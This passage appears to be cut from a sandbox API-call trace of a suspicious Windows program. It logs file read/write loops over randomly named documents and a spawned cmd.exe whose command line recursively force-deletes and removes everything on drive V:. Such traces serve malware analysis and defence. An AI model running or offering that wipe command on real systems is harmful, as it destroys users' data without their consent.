dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x80830 [0072.590] malloc (_Size=0x28) returned 0x787e00 [0072.590] malloc (_Size=0x28) returned 0x787f80 [0072.590] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.591] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x166b0, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x166b0, lpOverlapped=0x0) returned 1 [0072.594] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x166b0, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x166b0, lpOverlapped=0x0) returned 1 [0072.596] GetTickCount () returned 0x11498a8 [0072.596] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.598] free (_Block=0x787f80) [0072.598] free (_Block=0x787e00) [0072.598] malloc (_Size=0x18) returned 0x7807e0 [0072.598] malloc (_Size=0x2c) returned 0x782058 [0072.598] strcmp (_Str1="=", _Str2="=") returned 0 [0072.598] strlen (_Str="22") returned 0x2 [0072.598] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#10", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0072.599] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#10", cchWideChar=3, lpMultiByteStr=0x7812d0, cbMultiByte=3, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="#10 \r", lpUsedDefaultChar=0x5ae8d4) returned 3 [0072.599] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.600] fputs (in: _Str=" 22% = #10", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.601] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.601] free (_Block=0xb5d808) [0072.601] malloc (_Size=0x8) returned 0xb5d808 [0072.601] GetTickCount () returned 0x11498b7 [0072.601] strcmp (_Str1="=", _Str2="=") returned 0 [0072.601] strlen (_Str="22") returned 0x2 [0072.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0072.601] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=14, lpMultiByteStr=0x7812d0, cbMultiByte=14, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="KaGXpX_uv.docx \r", lpUsedDefaultChar=0x5ae8d4) returned 14 [0072.601] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.602] fputs (in: _Str=" 22% = KaGXpX_uv.docx", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.603] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.603] free (_Block=0xb5d808) [0072.603] SetFilePointer (in: hFile=0x80, lDistanceToMove=618208, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0x96ee0 [0072.603] malloc (_Size=0x28) returned 0x787e00 [0072.603] malloc (_Size=0x28) returned 0x787f80 [0072.603] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.604] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x9360, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x9360, lpOverlapped=0x0) returned 1 [0072.605] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0x9360, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0x9360, lpOverlapped=0x0) returned 1 [0072.607] GetTickCount () returned 0x11498b7 [0072.607] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.608] free (_Block=0x787f80) [0072.608] free (_Block=0x787e00) [0072.608] malloc (_Size=0x18) returned 0x78a410 [0072.608] malloc (_Size=0x34) returned 0x786950 [0072.608] malloc (_Size=0xa) returned 0x78a138 [0072.608] strcmp (_Str1="=", _Str2="=") returned 0 [0072.608] strlen (_Str="23") returned 0x2 [0072.608] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#11", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0072.609] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#11", cchWideChar=3, lpMultiByteStr=0x7812d0, cbMultiByte=3, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="#11 \r", lpUsedDefaultChar=0x5ae8d4) returned 3 [0072.609] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.610] fputs (in: _Str=" 23% = #11", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.610] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.611] free (_Block=0x78abe0) [0072.611] malloc (_Size=0x8) returned 0x78abe0 [0072.611] GetTickCount () returned 0x11498b7 [0072.611] strcmp (_Str1="=", _Str2="=") returned 0 [0072.611] strlen (_Str="23") returned 0x2 [0072.611] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.611] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=13, lpMultiByteStr=0x7812d0, cbMultiByte=13, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="KGvZ520tJ.ods \r", lpUsedDefaultChar=0x5ae8d4) returned 13 [0072.611] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.612] fputs (in: _Str=" 23% = KGvZ520tJ.ods", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.613] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.613] free (_Block=0x78abe0) [0072.613] SetFilePointer (in: hFile=0x80, lDistanceToMove=655936, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0xa0240 [0072.613] malloc (_Size=0x28) returned 0x787e00 [0072.613] malloc (_Size=0x28) returned 0x787f80 [0072.613] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.613] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0xf320, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0xf320, lpOverlapped=0x0) returned 1 [0072.615] WriteFile (in: hFile=0xc4, lpBuffer=0x100000*, nNumberOfBytesToWrite=0xf320, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesWritten=0x5ae960*=0xf320, lpOverlapped=0x0) returned 1 [0072.617] GetTickCount () returned 0x11498c7 [0072.617] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.618] free (_Block=0x787f80) [0072.618] free (_Block=0x787e00) [0072.618] malloc (_Size=0x18) returned 0x78a450 [0072.618] malloc (_Size=0x34) returned 0x786990 [0072.618] malloc (_Size=0xa) returned 0x78a168 [0072.618] strcmp (_Str1="=", _Str2="=") returned 0 [0072.618] strlen (_Str="25") returned 0x2 [0072.618] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#12", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0072.618] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="#12", cchWideChar=3, lpMultiByteStr=0x7812d0, cbMultiByte=3, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="#12 \r", lpUsedDefaultChar=0x5ae8d4) returned 3 [0072.618] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.620] fputs (in: _Str=" 25% = #12", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.620] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.620] free (_Block=0x78ac00) [0072.620] malloc (_Size=0x8) returned 0x78ac00 [0072.621] GetTickCount () returned 0x11498c7 [0072.621] strcmp (_Str1="=", _Str2="=") returned 0 [0072.621] strlen (_Str="25") returned 0x2 [0072.621] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mcjVmrm7V7AJ6t.odt", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0072.621] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mcjVmrm7V7AJ6t.odt", cchWideChar=18, lpMultiByteStr=0x7812d0, cbMultiByte=18, lpDefaultChar=0x5ae8e8, lpUsedDefaultChar=0x5ae8d4 | out: lpMultiByteStr="mcjVmrm7V7AJ6t.odt \r", lpUsedDefaultChar=0x5ae8d4) returned 18 [0072.621] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.622] fputs (in: _Str=" 25% = mcjVmrm7V7AJ6t.odt", _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.622] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0072.622] free (_Block=0x78ac00) [0072.623] SetFilePointer (in: hFile=0x80, lDistanceToMove=718176, lpDistanceToMoveHigh=0x5ae9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae9a4*=0) returned 0xaf560 [0072.623] malloc (_Size=0x28) returned 0x787e00 [0072.623] malloc (_Size=0x28) returned 0x787f80 [0072.623] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0072.623] ReadFile (in: hFile=0x80, lpBuffer=0x100000, nNumberOfBytesToRead=0x138d0, lpNumberOfBytesRead=0x5ae920, lpOverlapped=0x0 | out: lpBuffer=0x100000*, lpNumberOfBytesRead=0x5ae920*=0x138d0, lpOverlapped=0x0) returned 1 [0072.626] WriteFile (hFile=0xc4, lpBuffer=0x100000, nNumberOfBytesToWrite=0x138d0, lpNumberOfBytesWritten=0x5ae960, lpOverlapped=0x0) Thread: id = 97 os_tid = 0x968 Process: id = "67" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42ba9000" os_pid = "0x31c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0x818 [0070.453] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbac | out: lpSystemTimeAsFileTime=0x1cfbac*(dwLowDateTime=0x7cd0160, dwHighDateTime=0x1d62400)) [0070.453] GetCurrentProcessId () returned 0x31c [0070.453] GetCurrentThreadId () returned 0x818 [0070.453] GetTickCount () returned 0x114904e [0070.453] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfba4 | out: lpPerformanceCount=0x1cfba4*=19058651738) returned 1 [0070.455] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0070.455] __set_app_type (_Type=0x1) [0070.455] __p__fmode () returned 0x770331f4 [0070.455] __p__commode () returned 0x770331fc [0070.455] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0070.456] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0070.456] GetCurrentThreadId () returned 0x818 [0070.456] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x818) returned 0x60 [0070.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0070.456] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0070.456] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0070.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfb3c | out: phkResult=0x1cfb3c*=0x0) returned 0x2 [0070.462] VirtualQuery (in: lpAddress=0x1cfb73, lpBuffer=0x1cfb0c, dwLength=0x1c | out: lpBuffer=0x1cfb0c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0070.462] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfb0c, dwLength=0x1c | out: lpBuffer=0x1cfb0c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0070.462] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfb0c, dwLength=0x1c | out: lpBuffer=0x1cfb0c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0070.462] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfb0c, dwLength=0x1c | out: lpBuffer=0x1cfb0c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0070.462] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfb0c, dwLength=0x1c | out: lpBuffer=0x1cfb0c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0070.462] GetConsoleOutputCP () returned 0x1b5 [0070.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0070.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0070.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0070.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0070.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0070.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0070.464] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0070.464] GetEnvironmentStringsW () returned 0x4e20f8* [0070.464] GetProcessHeap () returned 0x4d0000 [0070.464] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaca) returned 0x4e2bd0 [0070.465] FreeEnvironmentStringsW (penv=0x4e20f8) returned 1 [0070.465] GetProcessHeap () returned 0x4d0000 [0070.465] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4) returned 0x4e1898 [0070.465] GetEnvironmentStringsW () returned 0x4e20f8* [0070.465] GetProcessHeap () returned 0x4d0000 [0070.465] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaca) returned 0x4e36a8 [0070.465] FreeEnvironmentStringsW (penv=0x4e20f8) returned 1 [0070.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceaac | out: phkResult=0x1ceaac*=0x68) returned 0x0 [0070.465] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x0, lpData=0x1ceab8*=0x0, lpcbData=0x1ceab0*=0x1000) returned 0x2 [0070.465] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x1, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.465] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x0, lpData=0x1ceab8*=0x1, lpcbData=0x1ceab0*=0x1000) returned 0x2 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x0, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x40, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x40, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x0, lpData=0x1ceab8*=0x40, lpcbData=0x1ceab0*=0x1000) returned 0x2 [0070.466] RegCloseKey (hKey=0x68) returned 0x0 [0070.466] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceaac | out: phkResult=0x1ceaac*=0x68) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x0, lpData=0x1ceab8*=0x40, lpcbData=0x1ceab0*=0x1000) returned 0x2 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x1, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x0, lpData=0x1ceab8*=0x1, lpcbData=0x1ceab0*=0x1000) returned 0x2 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x0, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x9, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x4, lpData=0x1ceab8*=0x9, lpcbData=0x1ceab0*=0x4) returned 0x0 [0070.466] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceab4, lpData=0x1ceab8, lpcbData=0x1ceab0*=0x1000 | out: lpType=0x1ceab4*=0x0, lpData=0x1ceab8*=0x9, lpcbData=0x1ceab0*=0x1000) returned 0x2 [0070.467] RegCloseKey (hKey=0x68) returned 0x0 [0070.467] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b70 [0070.467] srand (_Seed=0x5eb34b70) [0070.467] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q" [0070.467] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"V:\" del /f /s /q \"V:\" & FOR /D %p IN (\"V:\") DO rmdir \"%p\" /s /q" [0070.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0070.467] GetProcessHeap () returned 0x4d0000 [0070.467] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4e20f8 [0070.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0070.468] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.468] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.468] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0070.468] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0070.468] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0070.468] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0070.468] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0070.468] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0070.468] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0070.468] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0070.468] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0070.468] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0070.468] GetProcessHeap () returned 0x4d0000 [0070.468] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e2bd0 | out: hHeap=0x4d0000) returned 1 [0070.468] GetEnvironmentStringsW () returned 0x4e2310* [0070.468] GetProcessHeap () returned 0x4d0000 [0070.468] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xae2) returned 0x4e4c70 [0070.469] FreeEnvironmentStringsW (penv=0x4e2310) returned 1 [0070.469] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0070.469] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0070.469] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0070.469] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0070.469] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0070.469] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0070.469] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0070.469] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0070.469] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0070.469] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0070.469] GetProcessHeap () returned 0x4d0000 [0070.469] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4e17c8 [0070.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf878 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0070.469] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf878, lpFilePart=0x1cf874 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf874*="Desktop") returned 0x25 [0070.469] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0070.469] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf5f4 | out: lpFindFileData=0x1cf5f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4e5760 [0070.470] FindClose (in: hFindFile=0x4e5760 | out: hFindFile=0x4e5760) returned 1 [0070.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf5f4 | out: lpFindFileData=0x1cf5f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4e5760 [0070.470] FindClose (in: hFindFile=0x4e5760 | out: hFindFile=0x4e5760) returned 1 [0070.470] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0070.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf5f4 | out: lpFindFileData=0x1cf5f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, 